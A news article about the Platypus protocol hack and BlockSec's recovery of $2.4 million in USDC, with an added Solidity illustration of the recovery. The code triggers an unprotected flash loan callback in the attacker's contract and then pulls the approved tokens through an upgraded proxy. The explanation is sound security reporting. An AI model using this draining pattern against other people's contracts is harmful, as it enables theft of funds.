Platypus salvages $2.4 million in hacked funds with BlockSec's help

Quick Take

  • The hacker who exploited Platypus only made off with a small portion of the initially stolen funds.
  • Blockchain security firm BlockSec found a loophole in the attacker’s contract and recovered $2.4 million to Platypus’ address by upgrading the protocol’s proxy to a new implementation.

After the Platypus protocol was hacked yesterday, at least $2.4 million in USDC stablecoin was returned to the exploited platform with help from blockchain security firm BlockSec.

Of the almost $9.1 million stolen from Platypus, the attacker was able to cash out only about $270,000, according to MetaSleuth, a fund-tracing visualization tool from BlockSec.

Some $8.5 million of the stolen funds is stuck in the contract it was transferred to, and another $380,000 from a second attempted exploit was accidentally sent back to Aave, on-chain data show.

Retrieving a portion of the stolen funds for Platypus hinged on BlockSec’s plan to take advantage of a loophole in the attacker’s contract.

“By leveraging this loophole, the project can transfer the funds from the attacker contract to the project's account,” Yajin Zhou, co-founder of BlockSec told The Block.

"The project recovered $2 million using the proof of concept provided by us. This was to recover the funds in the attacker's contract,” according to Zhou, who added that some $8 million in assets were stranded since the attacker contract lacks a transfer function.

Callback the hack

To get the funds back, BlockSec made use of a callback function in the attacker’s contract that the attacker had left without access control.

"The attack was launched through the flash loan callback interface in the attack contract. This callback function has no access control. And during this callback function, the attacker hardcoded the logic to approve USDC to the project’s contract (which is a proxy),” Zhou noted.

“So the project can first invoke the callback function in the attacker contract to approve USDC to the project’s contract. Then the project contract can withdraw the USDC from the attacker contract by upgrading the proxy to a new implementation," said Zhou.
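The two-step recovery Zhou describes, written out as an added illustration (this is not BlockSec’s proof of concept or the actual Platypus or attacker contracts; the function names `onFlashLoan`, `recover` and `upgradeTo`, the bare-bones proxy and the `amount` parameter are assumptions made for the example). The attacker contract exposes a flash loan callback that anyone can call and that hardcodes an approval of USDC to the project’s proxy; the project upgrades the proxy to an implementation that first triggers that callback and then pulls the approved USDC out with `transferFrom`. Because the implementation runs under `delegatecall`, `address(this)` inside it is the proxy, which is exactly the spender the attacker approved:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Minimal ERC-20 surface needed for the example.
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Shape of the attacker contract as the article describes it (names assumed):
// a flash loan callback with no access control that hardcodes an approval of
// USDC to the project's proxy, and no function to transfer tokens out.
contract AttackerLike {
    IERC20 public immutable usdc;
    address public immutable projectProxy;

    constructor(IERC20 _usdc, address _projectProxy) {
        usdc = _usdc;
        projectProxy = _projectProxy;
    }

    // Loophole: no check that msg.sender is the lending pool or that the
    // loan was initiated by this contract, so anyone can invoke it directly.
    function onFlashLoan(uint256 amount) external returns (bool) {
        // The approval persists in USDC's allowance mapping after the call.
        usdc.approve(projectProxy, amount);
        // The original attack steps followed here; they are omitted in this
        // illustration because only the approval matters for recovery.
        return true;
    }
    // Nothing here can move other tokens out, which is why assets that were
    // never approved to anyone remain stranded in the contract.
}

// Bare-bones upgradeable proxy (assumed; real proxies use EIP-1967 slots).
// Storage layout: slot 0 = admin, slot 1 = implementation.
contract Proxy {
    address public admin;
    address public implementation;

    constructor(address _impl) {
        admin = msg.sender;
        implementation = _impl;
    }

    function upgradeTo(address _impl) external {
        require(msg.sender == admin, "not admin");
        implementation = _impl;
    }

    fallback() external payable {
        address impl = implementation;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Implementation the proxy is upgraded to for the recovery. Its storage
// layout mirrors the proxy so the delegatecalled code reads the proxy's admin.
contract RecoveryImpl {
    address public admin;
    address public implementation;

    function recover(IERC20 usdc, AttackerLike attacker, address treasury, uint256 amount) external {
        require(msg.sender == admin, "not admin");
        // Step 1: trigger the unprotected callback. Inside it the attacker
        // contract approves `amount` of USDC to address(this), i.e. the proxy.
        require(attacker.onFlashLoan(amount), "callback failed");
        // Step 2: spend that allowance and move the USDC to the project.
        require(usdc.transferFrom(address(attacker), treasury, amount), "transferFrom failed");
    }
}
```

Usage, in the order the article gives: the proxy admin calls `proxy.upgradeTo(address(recoveryImpl))`, then `RecoveryImpl(address(proxy)).recover(usdc, attacker, treasury, amount)`; the `recover` call falls through to the proxy’s fallback and executes in the proxy’s context, so the `transferFrom` is made by the address the attacker approved. The same shape explains the limit of the technique: only the token that the callback hardcodes an approval for (USDC, approved to the Platypus proxy) can be pulled out this way, and the rest of the attacker’s holdings stay locked because, as the article notes, the contract has no transfer function. The general check the attacker omitted, and that any contract implementing a flash loan callback should have, is `require(msg.sender == address(lendingPool) && initiator == address(this))` at the top of the callback.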

Correction: Updated to correct Platypus' formal name. 

© 2023 The Block. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.